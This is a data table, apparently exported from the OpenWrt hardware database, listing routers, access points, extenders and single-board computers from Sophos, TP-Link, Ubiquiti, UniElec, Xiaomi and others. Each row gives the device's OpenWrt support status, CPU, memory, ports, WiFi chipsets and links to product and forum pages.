449 | WiFi Router | Sophos | RED 15w | Rev. 1 | unknown 2022 | 21.02.3 | Freescale P1010 | ¿ | 1 | 128NAND | 128 | – | 5 | b/g/n | a/n | Atheros AR9382, SparkLan WPEA-121N | – | 1x 2.0 | View/Edit data | |||||
450 | WiFi Router | Sophos | XG 85w | rev 1 | unknown 2022 | snapshot | Intel Atom E3825 | 1333 | 2 | 8, 8192 eMMC | 2048 | – | 4 | b/g/n | a/n | Daul-Band 2T2R | SparkLAN WPEA-121N Atheros AR9382 | – | 2x 2.0 | http://¿ | View/Edit data | |||
451 | Sophos | XG 86 | Rev 1 | unknown 2022 | snapshot | Intel Atom E3930 | 1300 | 2 | 8, more than 8GB eMMC | 4096 | – | 4 | – | – | – | 2x 2.0 | http://¿ | View/Edit data | ||||||
452 | WiFi Router | Strong | 1200 | Available 2022 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7602EN, MediaTek MT7612EN | – | 1x 3.0 | https://www.strong.tv/fr/products/broad-router/router1200 | 1200 | http://forum.openwrt.org/t/support-for-strong-1200/22768 | View/Edit data | |||
453 | WiFi Router | Teltonika | RUT900 | Available 2022 | 19.07.10 | Atheros AR9344 | 550 | 1 | 16 | 128 | 4 | – | b/g/n | – | Atheros AR9344 | Mobile Wireless/Cellular network | – | https://teltonika-networks.com/product/rut900/ | View/Edit data | |||||
454 | WiFi Router | Teltonika | RUT955 | Available 2020 | 21.02.3 | microSD | Atheros AR9344 | 550 | 1 | 16, microSDHC | 128 | 4 | – | b/g/n | – | Atheros AR9344 | LTE | 1x 2.0 | https://teltonika-networks.com/de/product/rut955/ | View/Edit data | ||||
455 | WiFi Router | Teltonika | RUT955 H7V3C0 | Available 2020 | 21.02.3 | microSD | Atheros AR9344 | 550 | 1 | 16, microSDHC | 128 | 4 | – | b/g/n | – | Atheros AR9344 | LTE | 1x 2.0 | https://teltonika-networks.com/de/product/rut955/ | View/Edit data | ||||
456 | WiFi Router | Teltonika | RUTX10 | unknown 2022 | snapshot | Qualcomm Atheros IPQ4018 | ¿ | 4 | 16, 256NAND | 256 | – | 4 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4019 | – | 1x 2.0 | https://teltonika-networks.com/product/rutx10 | View/Edit data | |||||
457 | WiFi Router | Teltonika | RUTX11 | Available 2022 | snapshot | Qualcomm Atheros IPQ4018 | 716 | 4 | 16, 256NAND | 256 | – | 4 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4019 | LTE | 1x 2.0 | http://teltonika-networks.com/product/rutx11/ | View/Edit data | |||||
458 | WiFi Router | Tenbay – KuWfi | T-MB5EU | v01 | unknown 2021 | snapshot | MediaTek MT7621AT | 880 | 2 | 16 | 256 | – | 5 | b/g/n/ax | a/n/ac/ax | MediaTek MT7905, MediaTek MT7975 MT7915E | – | 1x 3.0 | https://www.kuwfi.com/products/- | View/Edit data | ||||
459 | Single Board Computer | Texas Instruments | BeagleBone Black | Available 2021 | 21.02.3 | Texas Instruments AM335x | 1000 | 1 | 2048NAND, microSDHC | 512 | 1 | – | – | – | – | – | 1x 2.0 | https://beagleboard.org/black | beaglebone_black | https://forum.openwrt.org/viewtopic.php?id=58808 | View/Edit data | |||
460 | Single Board Computer | Toradex | Apalis iMX6 Quad 2GB | Available 2022 | 21.02.3 | NXP i.MX6 Quad | 800 | 4 | 4096, eMMC | 2048 | – | 1 | – | – | – | – | 1x OTG, 4x 2.0 | https://www.toradex.com/computer-on-modules/apalis-arm-family/nxp-freescale-imx-6 | View/Edit data | |||||
461 | Single Board Computer | Toradex | Apalis iMX6 Dual 1GB | Available 2022 | 21.02.3 | NXP i.MX6 Dual | 800 | 2 | 4096, eMMC | 1024 | – | 1 | – | – | – | – | 1x OTG, 4x 2.0 | https://www.toradex.com/computer-on-modules/apalis-arm-family/nxp-freescale-imx-6 | View/Edit data | |||||
462 | Single Board Computer | Toradex | Apalis iMX6 Dual 512MB | Available 2022 | 21.02.3 | NXP i.MX6 Dual | 1000 | 2 | 4096, eMMC | 512 | – | 1 | – | – | – | – | 1x OTG, 4x 2.0 | https://www.toradex.com/computer-on-modules/apalis-arm-family/nxp-freescale-imx-6 | View/Edit data | |||||
463 | Single Board Computer | Toradex | Apalis iMX6 Quad 1GB | Available 2022 | 21.02.3 | NXP i.MX6 Quad | 1000 | 4 | 4096, eMMC | 1024 | – | 1 | – | – | – | – | 1x OTG, 4x 2.0 | https://www.toradex.com/computer-on-modules/apalis-arm-family/nxp-freescale-imx-6 | View/Edit data | |||||
464 | WiFi Router | TOTOLINK | X5000R | Available 2021 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 256 | – | 5 | b/g/n/ax | a/n/ac/ax | MediaTek MT7915DA, MediaTek MT7915DN | – | – | https://www.totolink.net/home/menu/newstpl/menu_newstpl/products/id/218.html | x5000r | View/Edit data | ||||
465 | WiFi Router | TOTOLINK | A7000R | unknown 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615N | – | – | https://www.totolink.net/home/menu/newstpl/menu_newstpl/products/id/171.html | View/Edit data | |||||
466 | WiFi AP | TP-Link | EAP225-Outdoor | v1 | Available 2020 | 21.02.0 | Qualcomm Atheros QCA9563 | 750 | 1 | 16 | 128 | – | 1 | b/g/n | a/n/ac | 2×2 MU-MIMO | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9886 | – | – | https://www.tp-link.com/business-networking/outdoor-ap/eap225-outdoor/ | eap225 | https://forum.openwrt.org/t/anyone-working-on-tp-link-eap225/33956/ | View/Edit data | |
467 | WiFi AP | TP-Link | EAP245 | v3 | Available 2021 | 21.02.0 | Qualcomm Atheros QCA9563 | 775 | 1 | 16 | 128 | – | 2 | b/g/n | a/n/ac | 3×3 MU-MIMO | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9982 | – | – | https://www.tp-link.com/en/business-networking/ceiling-mount-ap/eap245/ | eap245_v3 | https://forum.openwrt.org/t/adding-openwrt-support-for-tp-link-eap245/57583 | View/Edit data | |
468 | WiFi Router | TP-Link | Archer A6 | v3 | Available 2021 | 21.02.3 | MediaTek MT7621DAT | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7613BE | – | – | https://www.tp-link.com/en/home-networking/wifi-router/archer-a6/ | View/Edit data | ||||
469 | WiFi Router | TP-Link | Archer A7 | v5 | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9563 | 750 | 1 | 16 | 128 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9880 | – | 1x 2.0 | https://www.tp-link.com/us/products/details/cat-9_Archer-A7.html | archer_a7_v5 | View/Edit data | |||
470 | WiFi Router | TP-Link | Archer C5 AC1200 | v2 | Available 2022 | 19.07.10 | WiFi 2.4GHz partly, WiFi 5GHz | Broadcom BCM47081 | 800 | 1 | 16 | 128 | – | 5 | b/g/n | a/n/ac | 3×3 | Broadcom BCM43217, Broadcom BCM4352 | – | 2x 2.0 | https://www.tp-link.com/en/products/details/cat-9_Archer-C5.html | archer-c5-c7-wdr7500 | https://forum.openwrt.org/viewtopic.php?id=58883 | View/Edit data |
471 | WiFi Router | TP-Link | Archer C6 | v2 (US) | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9563 | 775 | 1 | 16 | 128 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9886 | – | – | https://www.tp-link.com/us/home-networking/wifi-router/archer-c6/ | archer_c6_v2 | View/Edit data | |||
472 | WiFi Router | TP-Link | Archer C6 AC1200 | v3 (US) (BR) (EU) | unknown 2021 | snapshot | MediaTek MT7621DAT | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603EN, MediaTek MT7613BEN | – | – | https://www.tp-link.com/en/home-networking/wifi-router/archer-c6/ | archer_c6_v3 | View/Edit data | |||
473 | WiFi Router | TP-Link | Archer C6U | v1 (EU) | Available 2021 | 21.02.3 | MediaTek MT7621DAT | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7613BE | – | 1x 2.0 | https://www.tp-link.com/en/home-networking/wifi-router/archer-c6u/ | archer_c6u_v1_eu | View/Edit data | |||
474 | WiFi Router | TP-Link | Archer C7 | v5 | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9563 | 750 | 1 | 16 | 128 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9880 | – | 1x 2.0 | https://www.tp-link.com/en/products/details/Archer-C7.html | archer_c7 | View/Edit data | |||
475 | WiFi Router | TP-Link | Archer D7 / D7b | v1 | Available 2020 | 21.02.0 | DSL modem | Qualcomm Atheros QCA9558 | 775 | 1 | 16 | 128 | – | 4 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880-BR4A | ADSL2 | 2x 2.0 | https://www.tp-link.com/en/home-networking/dsl-modem-router/archer-d7/ | archer_d7 | View/Edit data | ||
476 | WiFi AP | TP-Link | EAP225-Wall | v2 | Available 2020 | 21.02.3 | Qualcomm Atheros QCA9561 | 775 | 1 | 16 | 128 | 4 | – | b/g/n | a/n/ac | 2×2 MU-MIMO | Qualcomm Atheros QCA9561, Qualcomm Atheros QCA9886 | – | – | https://www.tp-link.com/de/business-networking/wall-plate-ap/eap225-wall/ | https://forum.openwrt.org/t/support-for-eap225-wall/71462 | View/Edit data | ||
477 | WiFi AP | TP-Link | EAP225 | v3 | Available 2020 | 21.02.3 | Qualcomm Atheros QCA9563 | 775 | 1 | 16 | 128 | – | 1 | b/g/n | a/n/ac | 2.4GHz 3×3, 5GHz 2×2 MU-MIMO | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9886 | – | – | https://www.tp-link.com/business-networking/ceiling-mount-ap/eap225/v3/ | https://forum.openwrt.org/t/anyone-working-on-tp-link-eap225/33956/ | View/Edit data | ||
478 | Range Extender | TP-Link | RE650 | v1 | Available 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 128 | – | 1 | b/g/n | a/n/ac | MediaTek MT7615E | – | – | https://www.tp-link.com/en/home-networking/range-extender/re650/ | re650_v1 | View/Edit data | |||
479 | WiFi Router | TP-Link | TL-WR941N | v6 (CN) | unknown 2022 | 18.06.9 | Atheros AR9344 | ¿ | 1 | ¿ | ¿ | ¿ | ¿ | b/g/n | – | Atheros AR9381 | ¿ | ¿ | View/Edit data | |||||
480 | WiFi Router | TP-Link | VR200 | Available 2022 | 21.02.3 | DECT, Wifi 2.4GHz | Lantiq XWAY VRX288 | 500 | 2 | 16 | 128 | – | 4 | b/g/n | a/n/ac | Lantiq XWAY WAVE300, MediaTek MT7610EN | VDSL2 | 2x 2.0 | vr200v | View/Edit data | ||||
481 | WiFi Router | TP-Link | VR200v | Available 2022 | 21.02.3 | DECT, Wifi 2.4GHz | Lantiq XWAY VRX288 | 500 | 2 | 16 | 128 | – | 4 | b/g/n | a/n/ac | Lantiq XWAY WAVE300, MediaTek MT7610EN | VDSL2 | 2x 2.0 | https://www.tp-link.com/de/products/details/cat-15_Archer-VR200v.html | vr200v | View/Edit data | |||
482 | WiFi AP | TP-Link | EAP235-Wall | v1 | Available 2021 | 21.02.0 | DFS | MT7621DAT | 880 | 2 | 16 | 128 | – | 4 | b/g/n | a/n/ac | MU-MIMO Wave 2 | MT7603, MT7613BE | – | – | https://www.tp-link.com/en/business-networking/wall-plate-ap/eap235-wall/#specifications | eap235-wall_v1 | https://forum.openwrt.org/t/adding-support-for-eap235-wall/86280/ | View/Edit data |
483 | Range Extender | TP-Link | RE350K | v1 | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 1 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9882 | – | – | https://www.tp-link.com/us/products/details/RE350K.html | re350k_v1 | View/Edit data | |||
484 | WiFi AP | TP-Link | TL-WA1201 | v2 | unknown 2020 | snapshot | Qualcomm Atheros QCA9563-AL3A | 775 | 1 | 16 | 512 | – | 1 | b/g/n | a/n/ac | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9886 | – | – | https://www.tp-link.com/us/home-networking/access-point/tl-wa1201/ | tl-wa1201_v2 | https://forum.openwrt.org/t/adding-openwrt-support-for-tl-wa1201-v2/96972 | View/Edit data | ||
485 | other | TP-Link | CPE710 | v1 | Available 2021 | snapshot | Qualcomm Atheros QCA9563-AL3A | 775 | 1 | 16 | 128 | – | 1 | – | a/n/ac | 23dBi high-gain directional 2×2 MIMO antenna and a dedicated metal reflector | Qualcomm Atheros QCA9896 | – | – | https://www.tp-link.com/en/business-networking/outdoor-radio/cpe710/ | cpe710_v1 | View/Edit data | ||
486 | WiFi AP | TP-Link | EAP615-Wall | v1 | Available 2021 | snapshot | MediaTek MT7621AT | 880 | 2 | 16 | 128 | – | 4 | b/g/n/ax | a/n/ac/ax | 2×2 MU-MIMO, OFDMA | MediaTek MT7905DAN, MediaTek MT7975DN | – | ¿ | https://www.tp-link.com/us/business-networking/omada-sdn-access-point/eap615-wall/ | eap615-wall | https://forum.openwrt.org/t/eap615-wall-do-you-know-what-chipset-it-is/114761 | View/Edit data | |
487 | WiFi Router | TP-Link | Archer A9 | v6 | unknown 2022 | snapshot | WiFi 2.4GHz | Qualcomm QCN5502 | ¿ | ¿ | 16 | 128 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9984, Qualcomm QCN5502 | – | 1x 2.0 | https://www.tp-link.com/us/home-networking/wifi-router/archer-a9/ | View/Edit data | |||
488 | WiFi AP | TP-Link | EAP265 HD | v1 | Available 2022 | snapshot | Qualcomm Atheros QCA9563 | 775 | 1 | 16 | 128 | – | 2 | b/g/n | a/n/ac | 3×3 MU-MIMO | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9982 | – | – | https://www.tp-link.com/en/business-networking/ceiling-mount-ap/eap265-hd/ | eap245_v3 | https://forum.openwrt.org/t/adding-openwrt-support-for-tp-link-eap-265/123154 | View/Edit data | |
489 | WiFi Router | TP-Link | Archer A6 | v2 (US) (TW) | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9563 | 775 | 1 | 16 | 128 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9886 | – | – | https://www.tp-link.com/us/home-networking/wifi-router/archer-a6/ | View/Edit data | ||||
490 | WiFi Router | TRENDnet | TEW-829DRU | v1.0R | Available 2022 | external image | Qualcomm IPQ4019 | 717 | 4 | 128NAND, 8 | 256 | – | 10 | b/g/n | a/n/ac | 2.4GHz | Qualcomm Atheros QCA9984, Qualcomm IPQ4019 | – | 1x 3.0 | http://www.trendnet.com/products/business-router/ac3000-tri-band-wireless-gigabit-dual-wan-vpn-smb-router-TEW-829DRU | tew-829dru | View/Edit data | ||
491 | WiFi Router | Turris CZ.NIC | Omnia | CZ11NIC13, CZ11NIC20, CZ11NIC23 | Available 2022 | 21.02.3 | RGB LED, secondary CPU uplink to switch | Marvell Armada 385 88F6820 | 1600 | 2 | 8, 8192 eMMC | 2048 | – | 6 | b/g/n | a/n/ac | 2×2 802.11b/g/n (2.4GHz), 3×3 802.11ac (2.4 / 5GHz) | Qualcomm Atheros AR9287 miniPCIe, Qualcomm Atheros QCA986x/988x mini-PCIe | – | 2x 3.0 | https://www.turris.cz/en/omnia/ | turris_omnia | View/Edit data | |
492 | Router | Ubiquiti | EdgeRouter (ER-8) | Available 2020 | 21.02.3 | Cavium CN6120 | 800 | 2 | 4096 eMMC | 2048 | – | 8 | – | – | – | 1x 2.0 | https://www.ubnt.com/edgemax/edgerouter/ | edgerouter | View/Edit data | |||||
493 | Router | Ubiquiti | EdgeRouter Lite | unknown 2022 | 21.02.3 | Cavium CN5020 | 500 | 2 | 4, 4096 | 512 | – | 3 | – | – | – | – | 1x 2.0 | https://www.ubnt.com/edgemax/edgerouter-lite/ | edgerouter_lite | https://forum.openwrt.org/viewtopic.php?id=49908 | View/Edit data | |||
494 | Router | Ubiquiti | EdgePoint R6 (EP-R6) | Available 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 256NAND | 256 | – | 5 | – | – | – | – | – | https://www.ubnt.com/edgemax/edgepoint/ | View/Edit data | |||||
495 | Router | Ubiquiti | EdgeRouter 4 | Available 2021 | 21.02.3 | Cavium CN7130 | 1000 | 4 | 4096 eMMC, 8 | 1024 | – | 3 | – | – | – | – | 1x 3.0 | https://www.ui.com/edgemax/edgerouter-4/ | edgerouter_4 | View/Edit data | ||||
496 | Router | Ubiquiti | EdgeRouter 6P (ER-6P) | Available 2021 | snapshot | Cavium CN7130 | 1000 | 4 | 4096 eMMC, 8 | 1024 | – | 5 | – | – | – | – | 1x 3.0 | https://www.ui.com/edgemax/edgerouter-6p/ | edgerouter_6p | View/Edit data | ||||
497 | Router | Ubiquiti | EdgeRouter X (ER-X) | Available 2022 | 21.02.3 | See forum | MediaTek MT7621AT | 880 | 2 | 256NAND | 256 | – | 5 | – | – | – | – | – | https://www.ubnt.com/edgemax/edgerouter-x/ | edgerouter_x_er-x_ka | https://forum.openwrt.org/viewtopic.php?pid=299587 | View/Edit data | ||
498 | WiFi AP | Ubiquiti | PowerBeam 5AC 500 ISO | XC | Available 2022 | 21.02.0 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 1 | – | a/n/ac | Qualcomm Atheros QCA988x | – | – | https://www.ui.com/airmax/powerbeam-ac-iso/ | powerbeam_5ac | https://forum.openwrt.org/t/help-to-install-openwrt-on-my-powerbeam-500-5ac-iso-version-xc/58414 | View/Edit data | ||
499 | WiFi AP | Ubiquiti | PowerBeam 5AC 500 | XC | Available 2020 | 21.02.3 | RSSI LEDs | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 1 | – | a/n/ac | Qualcomm Atheros QCA988X | – | – | https://www.ui.com/airmax/powerbeam-ac/ | powerbeam_5ac | View/Edit data | ||
500 | WiFi AP | Ubiquiti | UniFi 6 Lite | Available 2021 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 32 | 256 | – | 1 | b/g/n | a/n/ac/ax | ac/ax on 5 GHz only, 2×2 MIMO (300 Mbps @ 2.4 Ghz, 1201 Mbps @ 5 GHz) | MediaTek MT7603, MediaTek MT7915 | – | – | https://store.ui.com/collections/unifi-network-access-points/products/unifi-ap-6-lite | unifi_6_lite | View/Edit data | |||
501 | WiFi AP | Ubiquiti | UniFi 6 LR | Available 2021 | 21.02.3 | MediaTek MT7622 | 1350 | 2 | 64 | 512 | – | 1 | b/g/n | a/n/ac/ax | ac/ax on 5 GHz only, 4×4 MIMO (600 Mbps @ 2.4 Ghz, 2400 Mbps @ 5 GHz) | MediaTek MT7622, MediaTek MT7915 | – | – | https://store.ui.com/collections/unifi-network-access-points/products/unifi-6-long-range-access-point | unifi_6_lr | View/Edit data | |||
502 | WiFi AP | Ubiquiti | UniFi AC HD | Available 2021 | 21.02.3 | Qualcomm IPQ8064 | 1400 | 2 | 256NAND, 32 | 512 | – | 2 | b/g/n | a/n/ac | 4×4 MU-MIMO WAVE2 | Qualcomm Atheros QCA9994 | – | 1x 3.0 | https://unifi-hd.ui.com/ | unifi_ac_hd | http://forum.openwrt.org/t/support-for-ubiquiti-unifi-ap-hd/81587 | View/Edit data | ||
503 | WiFi AP | Ubiquiti | UniFi AC Mesh | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9563 | 775 | 1 | 16 | 128 | – | 1 | b/g/n | a/n/ac | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA988x | – | – | https://unifi-mesh.ubnt.com/ | unifiac | View/Edit data | ||||
504 | WiFi AP | Ubiquiti | UniFi AC Mesh Pro | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9563-AL3A | 775 | 1 | 16 | 128 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9880 | – | – | http://dl.ubnt.com/datasheets/unifi/UniFi_AC_Mesh_DS.pdf | unifiac | View/Edit data | ||||
505 | WiFi AP | Ubiquiti | UniFi AP PRO | Available 2022 | 21.02.3 | Atheros AR9344 rev 2 | 560 | 1 | 16 | 128 | – | 2 | b/g/n | a/n | 3×3 MIMO | Atheros AR9280 | – | – | https://www.ubnt.com/enterprise/ | unifi_ap_pro | View/Edit data | |||
506 | WiFi Router | Ubiquiti | UniFi AP AC Lite | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9563 | 775 | 1 | 16 | 128 | – | 1 | b/g/n | a/n/ac | 2×2 MIMO | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9882 | – | – | https://www.ubnt.com/unifi/unifi-ap-ac-lite/ | unifiac | View/Edit data | |||
507 | WiFi AP | Ubiquiti | UniFi AP AC LR | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9563 | 775 | 1 | 16 | 128 | – | 1 | b/g/n | a/n/ac | 2.4 GHz 3×3 MIMO – 5 GHz 2×2 MIMO | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9882 | – | – | https://www.ubnt.com/unifi/unifi-ap-ac-lr/ | unifiac | View/Edit data | |||
508 | WiFi Router | Ubiquiti | UniFi AP AC PRO | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9563 | 775 | 1 | 16 | 128 | – | 2 | b/g/n | a/n/ac | 3×3 MIMO | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9880 | – | 1x 2.0 | https://web.archive.org/web/20220112131933/https://www.ubnt.com/unifi/unifi-ap-ac-pro/ | unifiac | View/Edit data | |||
509 | WiFi AP | Ubiquiti | UniFi nanoHD | Available 2020 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 32 | 128 | – | 1 | b/g/n | a/n/ac | 4×4 MU-MIMO WAVE2 | MediaTek MT7603, MediaTek MT7615 | – | – | https://unifi-nanohd.ui.com/ | View/Edit data | ||||
510 | Router | Ubiquiti | EdgeRouter X-SFP (ER-X-SFP) | Available 2022 | 21.02.3 | Crypto engine, HwNAT, SFP | MediaTek MT7621AT | 880 | 2 | 256NAND | 256 | – | 5 | – | – | – | – | – | https://www.ubnt.com/edgemax/edgerouter-x-sfp/ | edgerouter_x_er-x_ka | View/Edit data | |||
511 | Router | Ubiquiti | EdgeRouter Pro (ERPro-8) | unknown 2020 | 21.02.3 | Cavium CN6120 | 1000 | 2 | 4096 | 2048 | – | 8 | – | – | – | – | 1x 2.0 | https://www.ubnt.com/edgemax/edgerouter/ | edgerouter_pro | View/Edit data | ||||
512 | WiFi AP | Ubiquiti | Rocket AC | unknown 2021 | snapshot | Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 1 | – | a/n/ac | 2×2 MIMO @ 27dBm | QCA988x | – | – | https://store.ui.com/collections/operator-airmax-devices/products/rocket-5ac-lite | View/Edit data | ||||
513 | Switch | Ubiquiti | USW-Flex | unknown 2022 | snapshot | MediaTek MT7621AT | 880 | 2 | 16 | ¿ | – | 5 | – | – | – | – | – | http://¿ | View/Edit data | |||||
514 | WiFi Router | UniElec | U7628-01 | Available 2022 | 21.02.3 | microSD card reader | MediaTek MT7628AN | 580 | 1 | 16, microSD | 128 | 5 | – | b/g/n | – | 1x mini-PCIe, MediaTek MT7628AN | – | 1x 2.0 | http://www.unielecinc.com/q/news/cn/p/product/detail.html?qd_guid=jZFULeWkzs | u7628-01 | View/Edit data | |||
515 | WiFi Router | UniElec | U7621-01 | unknown 2021 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7612 | LTE | 1x 2.0 | http://www.unielecinc.com/q/news/cn/h/MDSixFKqTp/ | View/Edit data | |||||
516 | WiFi Router | UniElec | U7621-06 | 512M/64M | Available 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 64 | 512 | – | 5 | ¿ | ¿ | 2x mini-PCIe | – | 1x 3.0, 1x Device | http://www.unielecinc.com/q/news/cn/p/product/detail.html?qd_guid=pyrEjfTmYf | u7621-06 | View/Edit data | |||
517 | WiFi Router | UniElec | U7623 | Available 2020 | 21.02.3 | MediaTek MT7623N | 1300 | 4 | 8192 eMMC | 512 | – | 5 | – | – | Order with choice of mini-PCIe WLAN, supports some third party boards | 2x mini-PCIe | – | 1x 3.0 | http://unielecinc.com/q/news/cn/p/product/detail.html?qd_guid=OjXwKCaRlN | u7623 | View/Edit data | |||
518 | WiFi Router | UniElec | U7621-06 | 256M/16M | Available 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16, microSD | 256 | – | 5 | ¿ | ¿ | 2x mini-PCIe | – | 1x 3.0, 1x Device | http://www.unielecinc.com/q/news/cn/p/product/detail.html?qd_guid=pyrEjfTmYf | u7621-06 | View/Edit data | |||
519 | WiFi Router | UniElec | U4019 | unknown 2022 | 21.02.3 | SD card | Qualcomm IPQ4019 | 717 | 4 | 32, microSD | 512 | – | 5 | b/g/n | a/n/ac | Qualcomm IPQ4019 | – | 1x 2.0 | http://www.unielecinc.com/q/news/cn/p/product/detail.html?qd_guid=flhHoiylKg | u4019 | View/Edit data | |||
520 | Emulator | VMware | VMware x86 virtual machine | 2022 latest | unknown 2022 | 15.05 | ¿ | x86 | ¿ | 1 | ¿ | ¿ | – | – | – | – | – | – | – | vmware | View/Edit data | |||
521 | Single Board Computer | VoCore | VoCore2 | Available 2022 | 21.02.3 | MediaTek MT7628AN | 580 | 1 | 16 | 128 | 1 | – | b/g/n | – | MediaTek MT7628AN | – | 1x µUSB (power) | http://vocore.io/v2.html | View/Edit data | |||||
522 | Single Board Computer | Wallys | DR40X9 | V02 | Available 2022 | external image | Qualcomm IPQ4019/29 | 716.8 | 4 | 128NAND, 16 | 512 | – | 2 | b/g/n | a/n/ac | MIMO | Qualcomm IPQ4019/29 | LTE | 1x 3.0 | https://www.wallystech.com/products_show.php?id=1&lm=1 | wallys_dr40x9_v02 | View/Edit data | ||
523 | Router | WatchGuard | Firebox M300 | Available 2021 | snapshot | NXP T2081 | 1500 | 4 | SD | 4096 | – | 8 | – | – | – | 2x 2.0 | https://www.watchguard.com/help/docs/hardware guides/Firebox_M200_M300_Hardware_Guide.pdf | firebox-m300 | View/Edit data | |||||
524 | WiFi Router | WAVLINK | WL-WN531A6 (QUANTUM D6) | Available 2020 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603EN, MediaTek MT7615N | – | 1x 3.0 | https://www.wavlink.com/en_us/product/WL-WN531A6.html | wl-wn531a6 | View/Edit data | ||||
525 | WiFi Router | WAVLINK | WL-WN532N2 | REV.F | unknown 2020 | external image | MediaTek MT7628N | 575 | 1 | 32 | 256 | 5 | – | b/g/n | ¿ | ¿ | – | – | http://www.wavlink.com/en_us/product/WL-WN532N2.html | View/Edit data | ||||
526 | WiFi Router | WeVO | 11AC NAS | unknown 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603EN, MediaTek MT7612EN | – | 1x 3.0 | http://iwevo.co.kr/product_intro.php?model=011010 | View/Edit data | |||||
527 | WiFi Router | WiFire | S1500 NBN | unknown 2022 | external image | MT7621AT | 880 | 2 | 128 | 128 | – | 5 | b/g/n | a/n/ac | MIMO 2×2 | MediaTek MT7602EN, MediaTek MT7612EN | – | 1x 2.0 | https://www.wifire.ru/blog/router-wifire-s1500-nbn | s1500_nbn | https://forum.openwrt.org/t/adding-support-for-sercomm-s1500-clones-beeline-smartbox-pro-wifire-s1500-nbn/110065 | View/Edit data | ||
528 | Single Board Computer | WIZnet | WizFi630S | Available 2022 | 21.02.3 | MediaTek MT7688AN | 580 | 1 | 32 | 128 | 3 | – | b/g/n | – | MediaTek MT7688 | – | 1x 2.0 | View/Edit data | ||||||
529 | Single Board Computer | WRTnode | WRTnode | 2P | unknown 2022 | 21.02.3 | MediaTek MT7628AN | 580 | 1 | 32 | 256 | 5 | – | b/g/n | – | MediaTek MT7628AN | – | 1x 2.0 | View/Edit data | |||||
530 | Single Board Computer | WRTnode | WRTnode | 2Q | unknown 2022 | 19.07.10 | Qualcomm Atheros QCA9531 | 560 | 1 | 16 | 128 | 5 | – | b/g/n | – | Qualcomm Atheros QCA9531 | ¿ | ¿ | View/Edit data | |||||
531 | Single Board Computer | WRTnode | WRTnode | 2R | Available 2020 | 21.02.3 | MediaTek MT7688AN | 580 | 1 | 32 | 256 | 5 | – | b/g/n | – | MediaTek MT7688AN | – | 1x 2.0 | View/Edit data | |||||
532 | WiFi Router | Xiaomi | AIoT Router AC2350 | Available 2022 | 21.02.3 | USB IoT radio | Qualcomm Atheros QCA9563 | 775 | 1 | 16 | 128 | – | 4 | b/g/n | a/n/ac | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9988 | – | 1x 2.0 Device, 1x Device | http://www.mi.com/global/mi-aiot-router-ac2350/ | aiot_router_ac2350 | http://forum.openwrt.org/t/support-aiot-ac2350-xiaomi/ | View/Edit data | ||
533 | WiFi Router | Xiaomi | Mi Router 3 Pro | Available 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 256NAND | 512 | – | 4 | b/g/n | a/n/ac | MediaTek MT7615 | – | 1x 3.0 | https://www.mi.com/miwifihd/ | mi_router_3_pro | https://forum.openwrt.org/t/support-for-xiaomi-wifi-r3p-pro/20290 | View/Edit data | |||
